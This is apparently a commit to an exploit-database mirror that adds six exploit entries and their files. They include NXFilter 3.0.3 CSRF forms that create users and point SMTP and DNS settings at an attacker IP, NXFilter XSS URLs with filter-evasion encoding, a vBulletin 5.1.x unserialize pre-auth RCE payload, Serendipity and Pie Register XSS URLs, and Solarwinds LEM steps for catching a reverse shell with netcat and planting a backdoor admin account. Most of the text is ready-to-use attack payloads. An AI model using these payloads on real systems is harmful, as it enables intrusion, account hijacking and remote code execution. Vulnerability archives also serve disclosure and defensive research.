DB: 2015-11-07

6 new exploits

files.csv

@@ -34816,6 +34816,8 @@ id,file,description,date,author,platform,type,port
 38534,platforms/php/webapps/38534.php,"Joomla 3.2.x - 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0
 38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
 38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service Vulnerability",2013-05-29,ariarat,multiple,dos,0
+38644,platforms/windows/remote/38644.txt,"Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0
+38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - CSRF Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
 38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0
 38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80
 38542,platforms/windows/local/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,local,0
@@ -34905,6 +34907,8 @@ id,file,description,date,author,platform,type,port
 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server Remote Denial of Service Vulnerability",2013-07-01,Chako,multiple,dos,0
 38627,platforms/android/remote/38627.sh,"Google Android 'APK' code Remote Security Bypass Vulnerability",2013-07-03,"Bluebox Security",android,remote,0
 38628,platforms/php/webapps/38628.txt,"HostBill 'cpupdate.php' Authentication Bypass Vulnerability",2013-05-29,localhost.re,php,webapps,0
+38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit",2015-11-05,hhjj,php,webapps,0
+38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 'serendipity_admin_image_selector.php' Cross Site Scripting Vulnerability",2013-07-12,"Omar Kurt",php,webapps,0
 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface Information Disclosure Vulnerability",2013-07-02,"Dan Farmer",multiple,remote,0
 38634,platforms/ios/remote/38634.txt,"Air Drive Plus Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0
 38635,platforms/php/webapps/38635.txt,"iVote 'details.php' SQL Injection Vulnerability",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0
@@ -34914,3 +34918,5 @@ id,file,description,date,author,platform,type,port
 38639,platforms/php/webapps/38639.txt,"miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
 38640,platforms/multiple/webapps/38640.rb,"OpenSSL Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0
 38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
+38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
+38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0

platforms/jsp/webapps/38645.txt

@@ -0,0 +1,152 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-CSRF.txt
+
+
+Vendor:
+================================
+www.nxfilter.org/p2/
+
+
+Product:
+================================
+NXFilter v3.0.3
+
+
+Vulnerability Type:
+=================================
+Cross site request forgery - CSRF
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+No CSRF protections exist allowing us to make malicious HTTP requests on
+behalf of our victim.
+The Server will then happily process any of the following actions if our
+victim clicks our infected linx
+or visits our malicious website while currently logged in to the vulnerable
+application.
+
+1) "add arbitrary users"
+2) "add or change SMTP settings"
+3) "add arbitrary redirect domains"
+4) "add arbitrary zone transfers"
+5) "delete zone transfer domains"
+
+
+Exploit code(s):
+===============
+
+<!DOCTYPE>
+<html>
+<head>
+<title></title>
+
+<body onLoad="doit()">
+
+<script>
+function doit(){
+ var e=document.getElementById('HELL')
+ e.submit()
+}
+</script>
+
+
+
+1) CSRF add arbitrary users
+
+<form id="HELL" action="http://localhost/user,user.jsp" method="post">
+<input type="text" name="action_flag" value="insert" >
+<input type="text" name="name" value="punksnotdead">
+<input type="text" name="description" value="<script>alert(666)</script>">
+ <---- and some persistent XSS!
+</form>
+
+
+2) CSRF add or change SMTP notification alerts
+
+<form id="HELL" action="http://localhost/config,alert.jsp" method="post">
+<input type="text" name="action_flag" value="update" >
+<input type="text" name="admin_email" value="ghostofsin@abyss.com">
+<input type="text" name="smtp_host" value="6.6.6.0">
+<input type="text" name="smtp_port" value="25">
+<input type="text" name="smtp_user" value="hyp3rlinx">
+<input type="text" name="smtp_passwd" value="abc123">
+<input type="text" name="period" value="0">
+<input type="text" name="token" value="">
+</form>
+
+
+
+3) CSRF add arbitrary redirect domain
+
+<form id="HELL" action="http://localhost/config,redirection.jsp"
+method="post">
+<input type="text" name="action_flag" value="insert" >
+<input type="text" name="src" value="hyp3rlinx.altervista.org">
+<input type="text" name="dst" value="6.6.6.0">
+</form>
+
+
+
+4) CSRF add arbitrary zone transfers
+
+<form id="HELL" action="http://localhost/config,zone_transfer.jsp"
+method="post">
+<input type="text" name="action_flag" value="insert" >
+<input type="text" name="domain" value="hyp3rlinx.altervista.org">
+<input type="text" name="ip" value="6.6.6.0">
+</form>
+
+
+
+5) CSRF delete zone transfer domains
+
+http://localhost/config,zone_transfer.jsp?action_flag=delete&id=1
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: October 18, 2015
+November 5, 2015  : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Description:
+==========================================================
+
+Request Method(s):              [+] GET / POST
+
+
+Vulnerable Product:             [+] NXFilter v3.0.3
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx

platforms/jsp/webapps/38646.txt

@@ -0,0 +1,102 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-XSS.txt
+
+
+Vendor:
+================================
+www.nxfilter.org/p2/
+
+
+Product:
+================================
+NXFilter v3.0.3
+
+
+Vulnerability Type:
+=========================
+Persistent & Reflected XSS
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+Persistent & reflected XSS entry points exist allowing arbitrary client
+side browser code execution
+on victims who click our infected linx or visit persistently stored XSS
+payloads. XSS strings seem
+to get filtered, yet we can defeat that using JS String.fromCharCode()
+functions.
+
+
+Exploit code(s):
+===============
+
+1) persistent XSS under category / custom
+   "name" parameter is vulnerable to persistent XSS injection using POST
+method.
+
+http://localhost/category,custom.jsp
+<input type="text" name="description" value="<script>alert(666)</script>"
+size="50">
+
+
+2) reflected XSS
+
+http://localhost/classifier,ruleset.jsp?action_flag=&page=1&kw=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&id=&domain=&keyword=&points=
+
+
+
+3) reflected XSS
+
+http://localhost/report,daily.jsp?stime=2015%2F10%2F17&time_option=yesterday&user=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2872%29%2bString.fromCharCode%2869%29%2bString.fromCharCode%2876%29%2bString.fromCharCode%2876%29%29%3C/script%3E
+
+
+
+Disclosure Timeline:
+=======================================
+Vendor Notification:  October 18, 2015
+November 5, 2015 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===================================================
+High
+
+
+Description:
+==================================================
+Request Method(s):              [+] GET / POST
+
+
+Vulnerable Product:             [+] NXFilter v3.0.3
+
+
+Vulnerable Parameter(s):        [+] name, user, kw
+
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx

platforms/php/webapps/38629.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
+# Date: Nov 4th, 2015
+# Exploit Author: hhjj
+# Vendor Homepage: http://www.vbulletin.com/
+# Version: 5.1.x
+# Tested on: Debian
+# CVE : 
+# I did not discover this exploit, leaked from the IoT.
+
+# Build the object
+php << 'eof'
+<?php
+class vB_Database {
+       public $functions = array();
+
+       public function __construct() 
+       {
+               $this->functions['free_result'] = 'phpinfo';
+       }
+}
+
+class vB_dB_Result {
+       protected $db;
+       protected $recordset;
+
+       public function __construct()
+       {
+               $this->db = new vB_Database();
+               $this->recordset = 1;
+       }
+}
+
+print urlencode(serialize(new vB_dB_Result())) . "\n";
+eof
+O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
+
+#Then hit decodeArguments with your payload :
+http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

platforms/php/webapps/38642.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/61138/info
+
+Serendipity is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Serendipity 1.6.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117
+&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117
+&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
+
+http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 

platforms/php/webapps/38643.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/61140/info
+
+Pie Register plugin for WordPress is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Pie Register 1.30 is vulnerable; other versions may also be affected. 
+
+<?php echo $_POST['pass1'];?>
+<?php echo $_POST['pass2'];?> 

platforms/windows/remote/38644.txt

@@ -0,0 +1,31 @@
+Requirements:
+
+Python 2.7
+netcat
+
+Tested on: 
+Ubuntu 14.04 LTS
+
+Vulnerable Appliance Version: 6.1.0
+Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe
+
+Instructions:
+
+The exploit_lem.py script will need to be run sudo since it uses sockets
+which bind to port 21 and 80. These could be changed, but the rest of 
+the script would need to be modified as well. 
+
+Prior to running the python script, set up a netcat listener for the
+reverse shell: netcat -l 4444
+
+Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444
+
+After access has been gained to the appliance, a new admin user can be added to the web console
+by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the xml structure 
+for the admin user that is already in there and then change the fields to create a new user. In
+order to get a valid password hash, use the gen_pass_hash.py script included with this package. 
+Please note that a manager restart will be needed before you can login with the new user. This 
+can be accomplished by running "/etc/init.d/contego-manager restart"
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38644.zip